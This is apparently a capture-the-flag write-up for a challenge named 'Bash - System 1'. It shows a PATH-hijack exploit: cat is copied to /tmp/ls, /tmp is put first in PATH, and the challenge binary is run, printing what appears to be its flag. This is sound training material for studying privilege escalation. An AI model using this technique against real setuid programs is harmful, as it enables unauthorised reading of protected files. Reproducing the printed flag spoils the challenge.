# 1. Bash - System 1

As you can see from the source code, the program is using the command line to run commands. The "ls" command is not using an absolute path meaning we can make it run a different command by modifying the path like so:

```
$ cp /bin/cat /tmp/ls
$ PATH=/tmp:$PATH ./ch11
!oPe96a/.s8d5
```
